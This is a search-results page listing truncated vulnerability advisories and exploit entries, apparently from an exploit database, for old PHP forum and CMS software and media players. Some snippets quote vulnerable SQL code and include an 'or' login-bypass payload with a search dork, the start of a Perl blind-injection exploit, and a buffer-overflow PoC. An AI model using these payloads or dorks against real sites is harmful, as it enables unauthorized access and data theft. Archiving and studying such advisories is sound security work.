92 matches found
动网论坛 (DVBBS) PHP 2.0++ dispuser.php sql注入漏洞
动网(DVBBS)论坛系统是一个采用PHP和MYSQL的数据架构的高性能网站论坛解决方案。 文件dispuser.php中: if isnumeric$id //第6行 $showUserID = intval$id; else if $UserName == '' $ErrCodes = $lang'UrlArgError'; …… if empty$showUserID //第35行 $updStmt .= " WHERE UserName='$UserName' "; $stmt .= " WHERE UserName='$UserName' "; $onstat = " WHER...
动网论坛 (DVBBS) PHP 2.0++ dispbbs.php sql注入漏洞
动网(DVBBS)论坛系统是一个采用PHP和MYSQL的数据架构的高性能网站论坛解决方案。 在文件dispbbs.php中: if $boardsettings55 != 0 && $TopicInfo'locktopic' == 0 && dateDiff'd',$TopicInfo'dateandtime',TIMENOW $boardsettings55 //第85行 $TopicInfo'locktopic' = 1; $setStmt = ',locktopic=1'; $db-query"UPDATE $dvtopic SET hits=CASE WHEN hits IS...
BlueCMS v1.6 sp1 ad_js.php SQL注入漏洞
缺陷文件:adjs.php 漏洞成因: 12: $adid = !empty$GET'adid' ? trim$GET'adid' : ''; //根目录下其他文件都做了很好的过滤,对数字型变量几乎都用了intval做限制,唯独漏了这个文件,居然只是用了trim去除头尾空格。。 19: $ad = $db-getone"SELECT FROM ".table'ad'." WHERE adid =".$adid; //直接代入查询 BlueCMS v1.6 sp1 SEBUG临时解决办法: $adid = !empty$GET'adid' ? intval$GET'adid' : '';...
phpcms 2 0 0 7 site management system Member. php page SQL injection vulnerability-vulnerability warning-the black bar safety net
Affected version: phpcms 2 0 0 7 GBK Vulnerability description: In the member/member. php line 4, The code is as follows: 1. .............. 2. $m = $db-getone SELECT FROM . TABLEMEMBER. m , . TABLEMEMBERINFO. i WHERE m. userid=i. userid AND m. username= 3. $username 4. , CACHE ,8 6 4 0 0; 5...
SopCast SopCore Control ActiveX Remote Exec 0day poc
No description provided by source. Exploit Title: SopCast SopCore Control ActiveX Remote Exec 0day poc Date: 2010.01.08 Author: superli Software Link: http://download.sopcast.cn/download/SopCast.zip Version: 3.2.4 Tested on: xpsp3 ie6 Code : check the attachment...
php168v6 getshell 0day-vulnerability warning-the black bar safety net
SEBUG-Appdir:Php168 Published:2009-12-26 Affected version: php168 v6. 0 vulnerability description: The two-step first do/jsarticle. php file if! eregi"^hot|com|new|lastview|like|pic$",$type die"Type Error"; $FileName=dirnameFILE."/../ cache/jsarticlecache/"; if$type==’like’ $FileName.= floor$id/3...
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
同样是在magicquotesgpc=off的情况下可用 此漏洞可拿到后台管理员的帐号和加密HASH,漏洞存在文件plus/feedbackjs.php,未过滤参数为$arcurl ...... $urlindex = 0; ifempty$arcID $row = $dlist-dsql-GetOne"Select id From @cachefeedbackurl where url='$arcurl' "; //此处$arcurl没有过滤 ifisarray$row $urlindex = $row'id';...
INMATRIX Zoom Player Pro <= 6.0.0 (.MID) Integer Overflow PoC
No description provided by source. !/usr/bin/env python INMATRIX Zoom Player Pro = 6.0.0 .MID Integer Overflow PoC Found By: DrIDE Credits: Platen Tested: verified on v 5.0.2 and 6.0.0 on XP SP3 Download: http://www.inmatrix.com MIDI Structure must be accurate buff =...
allomani 2007 (cat) Remote SQL Injection Vulnerability
No description provided by source. ================== NaMe: allomani 2007 = SQL Injection Vulnerability Author : NeX HackEr Contact: [email protected] ================== Script site : http://allomani.com ================== ExplOiT: UserName http://www.xxx.com/path/index.php?action=browse&cat=-1 and...
Moa Gallery 1.1.0 (gallery_id) Remote SQL Injection Vulnerability
No description provided by source. ====================================================================== » Script : Moa gallery 1.1.0 galleryid Remote Sql injection vuln » Language : php » Download : http://sourceforge.net/projects/moagallery/ » Script site : http://www.moagallery.net/ »...
ITechBids 8.0 (itechd.php productid) Blind SQL Injection Exploit
No description provided by source. !/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV1 print " \n"; print " VIVA ISLAME VIVA ISLAME \n"; print " VIVA ISLAME VIVA ISLAME \n"; print " \n"; print " ITechBids v8.0 Blind SQL Injection Exploit \n"; print " \n"; print " itechd.php productid...
Fotoshow PRO (category) Remote SQL Injection Vulnerability
No description provided by source. »====================================================================================================================-X » » » Fotoshow PRO™ category Remote SQL Injection Vulnerability » » » » ======= ------d-------m------ ==== ==== » » || = | |o o| |...
PHP Email Manager (remove.php ID) SQL Injection Vulnerability
No description provided by source. ===========================================|- Mtrb3 hena Security-Code ===========================================|- script :- PHP Email Manager Remote SQL Injection Vulnerability...
PHPCityPortal (Auth Bypass) Remote SQL Injection Vulnerability
No description provided by source. Script Name: PHPCityPortal Auth Bypass SQL Injection Vulnerability Author: CoBRa21 Mail: [email protected] Script Page: http://phpcityportal.com/ DOrk: intext:"Powered by PHPCityPortal.com" EXPLOIT Username: 'or' Password: 'or' http://localhost/path/login.p...
PHP Script Forum Hoster (Topic Delete/XSS) Multiple Vulnerabilities
No description provided by source. \ \ \ / / /\ \ / /| \ / \ | \ \ //\ \ / / / / ruling the web since 9/2008 "Word is born Fight the war fuck the norm!" = "PHP Script Forum Hoster" Multiple vulnerabilities Vendor : http://www.shop-020.de Download :...
Blaze HDTV Player 6.0 (.PLF File) Local Buffer Overflow Exploit (SEH)
No description provided by source. !/usr/bin/perl by hack4love [email protected] Blaze HDTV Player 6.0 .PLF File Local Buffer Overflow Exploit SEH easy Thanks for SkuLL-HacKeR and all WwW.Sec-ArT.CoM/cc team AND special THANKS FOR EL7ADRANY AND 3ASFH TEAM this work sooooooooo good Tested on:...
Phorum <= 5.2.11 Permanent Cross Site Scripting Vulnerabilities
No description provided by source. //----- Advisory Program : Phorum 5.2.11 and prior Homepage : http://www.phorum.org/ Discovery : 2009/07/16 Author Contacted : 2009/07/17 Found by : CrashFr This Advisory : CrashFr //----- Application description Started in 1998, Phorum was the original PHP and...
powerUpload 2.4 (Auth Bypass) Insecure Cookie Handling Vulnerability
No description provided by source. || || | || o,7 || . o7 || 4||| ow, : / / . |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| | | | /' \ /'\ /\ \ /'\ /\ \ | | /, \ /\/\L\ \ \ \ ,/\ /\ \ \ \ / | | //\ \ /' \ /\ //\ /'\ \ /\ \ \ \ /'\ \ | | \ \ /\ /\ \ \ \ /...
Playlistmaker 1.5 (.M3U/M3L/TXT File) Local Stack Overflow PoC
No description provided by source. !/usr/bin/perl Playlistmaker v1.5 .M3U/M3L/Txt File Local Stack Overflow POC Download: http://proletsoft.freeservers.com/mmb/playlistmaker.html Welcom Back Milw0rm my $crash="\x41" x 5000 ; openmyfile,'PoC.m3u'; M3U/M3L/Txt print myfile $crash; By ThE g0bL!N...
WebAsyst Shop-Script (bSQL/XSS) Multiple Remote Vulnerabilities
No description provided by source. ============================================================================================= Title : Blind SQL/XSS Multiple Remote Vulnerabilities Software : WebAsyst Shop-Script Vendor : http://www.webasyst.net Date : 03 July 2009 Indonesia Author : Vrs-hCk...